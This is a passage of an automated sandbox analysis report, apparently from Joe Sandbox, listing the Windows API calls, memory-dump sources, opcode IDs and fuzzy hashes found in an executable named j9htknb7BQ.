                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                                          • String ID:
                                                                          • API String ID: 2685184028-0
                                                                          • Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                          • Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
                                                                          • Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                          • Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID:
                                                                          • API String ID: 3660427363-0
                                                                          • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                          • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                          • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                          • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                          APIs
                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                          • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnum
                                                                          • String ID:
                                                                          • API String ID: 2818636725-0
                                                                          • Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                          • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                          • Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                          • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                          • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocDecompressInitVirtualZ2_bz
                                                                          • String ID:
                                                                          • API String ID: 3582128297-0
                                                                          • Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                          • Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
                                                                          • Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                          • Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindFree
                                                                          • String ID:
                                                                          • API String ID: 4097029671-0
                                                                          • Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                          • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                          • Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                          • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID:
                                                                          • API String ID: 55378915-0
                                                                          • Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                          • Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
                                                                          • Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                          • Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                          • Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
                                                                          • Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                          • Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
                                                                          APIs
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
                                                                          • GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2018770650-0
                                                                          • Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                          • Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
                                                                          • Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                          • Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                          • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 1799206407-0
                                                                          • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                          • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                          • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                          • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                          Strings
                                                                          • bzlib: Too much memory requested, xrefs: 0045D021
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: bzlib: Too much memory requested
                                                                          • API String ID: 4275171209-1500031545
                                                                          • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                          • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                          • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                          • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorLoad
                                                                          • String ID:
                                                                          • API String ID: 3238433803-0
                                                                          • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                          • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                          • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                          • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                          • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                          • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                          • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,?,00000000), ref: 0044FF6E
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,?,00000000), ref: 0044FF76
                                                                            • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                          • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                          • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                          • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                          • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                          • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                          • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                            • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                          • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                          • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                          • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                          APIs
                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoScroll
                                                                          • String ID:
                                                                          • API String ID: 629608716-0
                                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                          APIs
                                                                            • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                            • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                            • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                            • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                          • String ID:
                                                                          • API String ID: 1039859321-0
                                                                          • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                          • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                          • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                          • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                          APIs
                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
